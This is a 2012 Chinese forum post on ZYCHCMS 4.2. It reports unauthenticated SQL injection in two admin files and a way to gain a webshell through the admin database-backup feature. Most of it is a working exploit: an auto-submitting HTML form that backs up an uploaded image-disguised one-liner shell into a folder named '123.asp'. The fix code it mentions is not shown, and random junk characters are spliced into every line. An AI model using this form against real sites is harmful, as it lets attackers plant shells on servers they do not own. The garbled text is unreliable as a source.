- H% M+ r" q8 G% q) Q4 i$ N9 R+ Q
2 M$ y8 Y9 @, ~
& H5 |$ C/ b1 G- q# {
4 D# w% [" l+ d
影响版本:ZYCHCMS企业网站管理系统4.2(存在以下两个文件的版本应该是通杀)
& i1 R/ d' u9 w3 Q- D ①SQL注射漏洞. W4 B! C% l) Z" e2 J
漏洞文件:/admin/add_js.asp & /admin/add_xm_jiang.asp
( T3 ?: R. h. P 漏洞原因:未过滤2 T) H; K& j7 u; b
漏洞代码:
! Y# j- j: f* |. v r' p 都是相同的,文件开头没有调用过滤文件/admin/seeion.asp,导致没有对当前权限进行判断,就直接操作数据库。/ Z5 |* b$ D3 t( n' {1 L
修复方法:在文件开头加入代码
" o1 c2 u# ] u* o
& m; N2 |4 U# `& C: P
* n; D; U4 w5 G/ J. t②后台拿WBSHELL
" }/ u: G5 w% ]- j& S+ O 进入后台有一个数据库备份,可以通过本地提交突破创建.asp后缀文件夹,并将一句话备份进去。
6 x) h2 ]$ k9 m8 R9 J. E: g 这里在网上找了一个,改了下,将就着用。( [, R- S' K3 L
以下是代码本地提交代码; `7 ~, j# X; @; y# h! Q. j
( m7 s. g/ \: p+ [
. M7 s3 H0 i8 t$ v<form method=”post” action=”http://localhost/admin/Manage_backup.asp?action=Backup” name=add>: l) M3 `! W' M/ z
<!–eg:http://127.0.0.1:99/admin/Manage_backup.asp?action=Backup–>. [9 Z5 t; y8 F4 M
<tr>+ Z2 h; Q. I; D: K y' g
<td height=”30″ background=”images/bg_list.gif”><div style=”padding-left:10px; font-weight:bold; color:#FFFFFF; text-align:left”>备份数据库</div></td>
& l5 [, J; u! F7 ?" e' _ y/ s </tr>
# T# `/ F# @1 b. N$ T <tr>
, s! j; p6 q3 W2 M2 l& E( [; o) C/ \" { <td bgcolor=”#FFFFFF”><span class=”back_southidc”>4 \1 F9 J- @9 E2 w: Z
</span>
' L- p# z6 e: v; ? <table width=”100%” border=”0″ align=”center” cellpadding=”5″ cellspacing=”0″ >- \8 x$ R% A4 ^
<tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″ >; F' ^4 J6 v) B
<td height=”25″ width=”30%” class=”td”><div align=”left”>当前数据库路径</div></td>* c- A' f5 \8 ` o
<td width=”70%” class=”td”>90sec. K5 L9 v8 S8 d% Y& S# j: P# u D9 d/ t
<div align=”left”>) }3 j- c* R& ]) ~: d# s
<input type=”text” size=”30″ name=”DBpath” value=”此处为你在其网站上传的图片格式一句话路径” />, j- V) j; E C" Y9 `
<!–eg:../uploadfile/image/Logo/20120803130885328532_ZYCH.jpg>, a( A; ]6 s7 U: r
<input type=”hidden” size=”50″ name=”bkfolder” value=”123.asp” />1 g* m2 e* M' Y$ ]$ ?
</div></td>5 V$ r) w0 D Q4 q9 D! q
</tr>. W8 g- D7 L' l8 k
<tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#FFFFFF’” bgcolor=”#FFFFFF”>. M6 W+ {( A1 h, ]8 M; H
<td height=”25″ width=”30%” class=”td”><div align=”left”>备份数据库名称</div></td> J3 J( N$ _) B1 S1 s. c
<td class=”td”><div align=”left”>: k8 |* N$ n K6 ?( A$ w
<input type=”text” size=”30″ name=”bkDBname” value=”4.mdb” />
S1 {& e+ D! g [如备份目录有该文件,将覆盖,如沒有,将自动创建]</div></td>9 p7 i; D7 `+ ` d8 a6 H* {
</tr>
0 g: x1 ]4 l! X/ |$ f! F <tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″>" N% \9 ?6 X7 F
<td height=”25″ width=”30%” class=”td”><div align=”left”></div></td>& R' O- H+ Z% k
<td class=”td”><div align=”left”>* p" k( f0 I' E* d
<input type=”submit” value=”确定备份” class=”btn”
- X& E( q; c7 t ^/ u# S G+ @ </div></td>6 `( z& \9 p7 I) V. B
</tr>7 I$ B, d$ C. P- J% M) r: I
</table></td></tr></form>1 F, }, e: q* [8 b
</table>+ x+ I% h; x) L* ]
</td> |, _; D6 u C9 y, ^1 X2 k7 p8 l Z
</tr>
5 q' g6 I2 [- y# K* w: t+ [' l( P </table>: Q" g5 |. `! |$ Y. \( k
<script>
7 w6 S) }: e& H" ^ document.all.add.submit();- E9 k& F7 l& f/ d$ y
</script>9 @% i- \# b7 {" G
) g5 m' K6 q1 b! T+ Y% ~; I7 V; C5 D- @; C8 f9 _# ~
0 S6 K& Q; n, J( o/ v+ F1 Z: S
9 ]% y% o& C- f. l" K. P2 j7 B. t6 O+ u, ` S
' e8 U( D* C8 Y( D" u! l# G
6 \) w D( Q0 U. L( a7 b7 I4 @, ^/ F5 m$ X4 |5 J
! N: [% i+ U/ _- [$ a" X' G. ~9 U
( y/ M9 y8 T" K1 v; Q; M" C5 i
|
发表于 2012-9-10 21:09:51
收藏
支持
反对